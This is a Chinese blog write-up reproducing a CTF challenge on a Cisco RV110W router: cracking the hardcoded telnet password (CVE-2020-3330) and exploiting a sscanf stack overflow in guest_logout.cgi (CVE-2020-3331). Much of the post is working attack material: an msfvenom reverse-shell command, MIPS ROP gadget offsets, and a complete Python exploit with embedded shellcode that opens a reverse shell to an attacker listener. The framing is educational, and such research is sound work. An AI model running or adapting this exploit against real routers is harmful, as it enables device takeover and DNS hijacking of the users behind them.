---
title: cisco-RV100W 漏洞复现记录
date: 2022-09-29 17:54:59 +0800
categories:
  - IOT
tags:
  - pwn
  - ctf
permalink: /posts/id=47/
pin: false
published:
---
## 前言

第一次上手路由器，收了个二手的RV100W开始了复现过程

过程比较长，主要是学一点关于IOT挖洞的相关知识

## 分析

题目如下

题目名称：CisCo
旗帜描述：CC
题目描述：挖掘并利用CISCO RV110W-E-CN-K9（固件版本1.2.2.5）中的漏洞，获取路由器的Root Shell，实现DNS劫持。
靶机环境：CISCO RV110W-E-CN-K9（固件版本1.2.2.5），设置后台管理密码、WIFI密码，默认关闭telnet。
附件信息：附件中提供了路由器固件（固件版本1.2.2.5，与靶机版本一致），路由器设备后台管理账号为cisco，密码为qwb2020 ，WiFi密码未设置。
展示环境拓扑：展台路由器WAN口连接互联网，选手攻击机和操作员验证机通过网线连接路由器LAN口，IP地址设置自动获取。
展示目标：选手携带自己的攻击机上台，通过有线方式连接路由器设备。在规定的时间内攻击展台路由器，获取路由器的Root Shell执行系统命令，劫持http://www.baidu.com为如下页面：

```html
<html><br><br><br><h1 style="font-size:100px;color:red;" align="center">Hacked by "teamname"</h1></html>
 ```


 操作人员使用验证机中的Firefox浏览器访问http://www.baidu.com查看攻击效果，确认实现DNS劫持后判定成功。 注意事项：上台展示题解的时候注意关闭exp的调试信息。
 
展示时操作人员操作步骤：
1） 重启路由器设备；
2） 将互联网网线连接路由器WAN口；
3） 验证机通过有线方式连接路由器设备LAN口；
4） 设置验证机的DNS服务器IP地址为路由器IP；
5） 清除浏览器历史记录，清除本机的DNS缓存；
6） 等待选手连接路由器；
7） 等待选手攻击；
8） 在规定时间内可以配合选手重启路由器设备（每次重启首先要重复步骤4，5）；
9） 选手攻击完毕后，操作人员使用验证机中的浏览器访问网页验证效果；
10）攻击成功或超时后：关闭路由器。

附件： [RV110W_FW_1.2.2.5.bin](https://github.com/VulnTotal-Team/IoT-vulhub/raw/master/Cisco/CVE-2020-3331/firmware/RV110W_FW_1.2.2.5.bin)

拿到手第一时间重置了一下，默认地址192.168.1.1，默认账号密码cisco:cisco，根据向导重新设置即可。

### 配置赛题环境

后台有可以进行直接刷机的地方，默认的版本并不是1.2.2.5，对应版本上传即可

![image-20221027160619154](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027160619154.png)

### 漏洞利用挖掘

扫描默认开启的端口，本地环境开启了telnet便于调试，远程是关闭的。用curl请求一下，发现本地会把80端口转发到443

![image-20221027162145627](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027162145627.png)

![image-20221027162539868](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027162539868.png)

固件用binwalk解包，得到文件系统

```bash
binwalk -Me RV110W_FW_1.2.2.5.bin
```

![image-20221027163050231](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027163050231.png)

特意给了低版本固件，很有可能和1day有关，搜集可能有用的cve

1.需要适用于赛题版本，最好在后续版本修复的漏洞。

2.当时比赛在20年以前，就看下20年以前的漏洞

![image-20221027163648745](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027163648745.png)

#### cve-2020-3330

cve-2020-3330说telnet有默认静态密码，搜索对应的cve利用文章就能得到利用方式

https://blogs.360.cn/post/yi-ge-zi-jie-cha-cuo-dao-zhi-Cisco-fang-huo-qiang-lu-you-qi-yuan-cheng-dai-ma-zhi-xing.html

由于是静态密码，这里全局搜索一下字符串即可

![image-20221027165331928](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027165331928.png)

再在文件中搜索这个字段，比较一下/etc//shadow的描述格式，md5解码即可

![image-20221027165449615](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027165449615.png)

![image-20221027165738133](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027165738133.png)

这样一来就能控制本地的路由器了



#### cve-2020-3331

远程只开启了443服务，结合3331和3323都有发起web请求的任意代码执行，我们可以在文件系统中找到443web服务的对应程序，通过找字段来找程序

![image-20221027170454415](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027170454415.png)

还有一种思路就是通过程序运行时端口进程调用会显示对应的程序信息

```bash
netstat -pantu | grep 443
ls -al /proc/356/exe
```

路由器上有wget，我们下载一个全功能的busybox：https://busybox.net/downloads/binaries/1.21.1/busybox-mipsel

(df -h 命令可检查文件系统空间是否足够，/tmp往往有临时的保存权限)

就能在硬件里自检测对应的端口程序

![image-20221027172023640](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027172023640.png)



ok，然后就分析一下这个程序，关于这个CVE我猜测当时应该没有公开的利用方式，要想快速找到其中的漏洞点，最好是和最近的修复版本做比较，在cisco路由器官网找到修复版本的固件进行分析：[https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.2.8](https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.2.8)

对程序比较这里用bindiff：[https://www.zynamics.com/software.html](https://www.zynamics.com/software.html)

安装路径为IDA的根目录，之后打开在IDA插件就能看见bindiff了，把高版本文件先打开再保存成idb文件，然后打开ida加载低版本，点bindiff，选择高版本的idb打开

在差异较大的部分，存在一个有关登录的函数guest_logout.cgi，搜索发现这是个有前科的cgi

这里存在一个sscanf，而新版本将其改为了strcpy

第一个参数是输入端，第二个参数是正则规则，后续参数是输入存入位置

分析一下这个正则：`%[^;];%*[^=]=%[^\n]`

1. `%[^;]`：分号前的所有字符都要
2. `;%*[^=]`：分号后，等号前的字符都不要
3. `=%[^\n]`：等号后，换行符前的所有字符都要

可以通过测试分析其功能

```c
#include <stdio.h>

int main(void){

    char var1[5] = "aaa";
    char var2[5] = "bbb";
    char var3[5] = "ccc";
    const char xxx[100] = "aaa;bbb=ccc";

    sscanf(xxx,"%[^;];%*[^=]=%[^n]", var1, var2, var3);
    printf("%s\n%s\n%s\n",var1,var2,var3);
    return 0;
}
```

![image-20221027182154512](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027182154512.png)

这样一来这里很可能存在栈溢出漏洞，要想触发这个函数就要绕过if判断。向上分析请求包含三个参数，cmac：mac地址格式，cip：ip地址格式，submit_button: 包含status_guestnet.asp

![image-20221027191124846](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027191124846.png)

我们需要进行发包测试，用request库进行构造，get或者post，如果能打崩就说明存在漏洞

```python
import requests
from pwn import *

url = "https://192.168.1.1/guest_logout.cgi"

payload = {"cmac":"12:af:aa:bb:cc:dd","submit_button":"status_guestnet.asp"+cyclic(100),"cip":"192.168.1.100"}
#requests.get(url, data=payload, verify=False, timeout=1)
requests.post(url, data=payload, verify=False, timeout=1)
```

经过测试post确实能打崩，接下来就调试一下具体的崩溃情况

利用telnet上传一个gdbserver

```bash
wget http://e4l4.com/gdbserver-7.12-mipsel-i-v1-sysv
mv gdbserver-7.12-mipsel-i-v1-sysv gdbserver
chmod +x ./gdbserver
./gdbserver :1234 --attach 356
```

本地调试

```bash
gdb-multiarch -q httpd
pwndbg> set architecture mips
pwndbg> set endian little
pwndbg> target remote 192.168.1.1:1234
pwndbg> c
```

然后打exp，然后程序就crash了，且PC被控制，计算一下溢出

```bash
cyclic -l 0x77616161
```



接下来就是在mips架构上构造栈溢出exp了，由于mips存在栈可执行的特性，基本思路都是ROP+shellcode。要注意的是这里采用的是scanf输入，如果payload中有\x00会被截断

用IDA插件mipsrop：[https://github.com/tacnetsol/ida/tree/master/plugins](https://github.com/tacnetsol/ida/tree/master/plugins) 来看看程序本身的gadget，地址都是0开头，而libc里的呢

![image-20221027194454166](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027194454166.png)

关于地址随机化，这里远程为1，即动态库的地址是随机的，但是似乎这个设备的libc基址并不会改变，是固定的且不是0开头，这里就可以使用libc里的gadget

```bash
cat /proc/sys/kernel/randomize_va_space
1
```

![image-20221027194951326](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027194951326.png)

然后shellcode部分采用msfvenom生成

```bash
下载对应版本deb https://apt.metasploit.com/
sudo dpkg -i metasploit-framework_5.0.85+20200412093615~1rapid7-1_arm64.deb
msfvenom
```

生成shellcode，得到的shellcode不含\x00

```bash
msfvenom -p linux/mipsle/shell_reverse_tcp  LHOST=192.168.1.100 LPORT=8888 --arch mipsle --platform linux -f py -o shellcode.py
```

![image-20221027200520517](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027200520517.png)

接下来就开始写exp，mips构造基本流程，使用ROP来构造类似`jmp esp`的指令

首先使用`mipsrop.stackfinder()`来寻找将栈地址放到其他寄存器的gadget

例如这里找到的

| **Address** | **Action**                | **Control Jump** |
| ----------- | ------------------------- | ---------------- |
| 0x000257A0  | addiu $a0,$sp,0x38+var_20 | jalr  $s0        |

这个gadget会将$sp寄存器的值加上0x38-0x20，放到$a0寄存器中，然后跳转到$s0寄存器中的地址去执行。

如果我们能控制$s0寄存器的值为一个跳转$a0的gadget，然后在`$sp+0x18`栈地址上布置shellcode即可利用成功。

也即是找到2个gadget，一个将shellcode地址放入寄存器，一个跳转到该寄存器执行。

在libc里找到2个跳转gadget

```python
mipsrop.stackfinder()
mipsrop.find("mov $t9,$a0")
```

分别如下

```python
jmp_s0 = libc + 0x000257A0  # addiu $a0,$sp,0x38+var_20 ; jalr  $s0 
jmp_a0 = libc + 0x0003D050  # move  $t9,$a0             ; jalr  $a0
```

关于如何设置$s0为jmp_a0，涉及到如何控制s组寄存器

详细关于mips pwn题的内容可以参考这篇文章：[https://xuanxuanblingbling.github.io/ctf/pwn/2020/09/24/mips/](https://xuanxuanblingbling.github.io/ctf/pwn/2020/09/24/mips/)

在MIPS的复杂函数的序言和尾声中，会保存和恢复s组寄存器，以guest_logout_cgi函数为例

![image-20221027203711581](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027203711581.png)

由于我们在85个溢出值处控制了$ra，0x55(85)-(0xC0+0X24)+(0xc0+0) = 0x31（49），在49个溢出值处放置jmp_a0，即可控制。$s0为对应值，同时在之前溢出测试中可以看到$s0被溢出成了'aaan'，也能用cyclic来直接计算到$s0的偏移。

这里shellcode用的这个部分改的[http://shell-storm.org/shellcode/files/shellcode-860.html](http://shell-storm.org/shellcode/files/shellcode-860.html)

```python
from pwn import *
import thread,requests

context.log_level='debug'
context(arch='mips',endian='little',os='linux')
io     = listen(31337)
libc   = 0x2af98000
jmp_a0 = libc + 0x0003D050  # move  $t9,$a0             ; jalr  $a0
jmp_s0 = libc + 0x000257A0  # addiu $a0,$sp,0x38+var_20 ; jalr  $s0 

shellcode = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
shellcode += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
shellcode += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
shellcode += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
shellcode += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
shellcode += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
shellcode += "\xf8\xff\xa5\xaf\x01\x64\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
shellcode += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
shellcode += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
shellcode += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
shellcode += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
shellcode += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
shellcode += "\xab\x0f\x02\x24\x0c\x09\x09\x01"

payload = "status_guestnet.asp"+'a'*49+p32(jmp_a0)+0x20*'a'+p32(jmp_s0)+0x18*'a'+shellcode
paramsPost = {"cmac":"12:af:aa:bb:cc:dd","submit_button":payload,"cip":"192.168.1.100"}

def attack():
    try: requests.post("https://192.168.1.1/guest_logout.cgi", data=paramsPost, verify=False,timeout=1)
    except: pass

thread.start_new_thread(attack,())
io.wait_for_connection()
log.success("getshell")
io.interactive()
```



![image-20221027214844874](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221027214844874.png)

## 小结

因为学业的原因，暂时研究时间比较少，有时间了慢慢研究这一块的内容，慢慢更新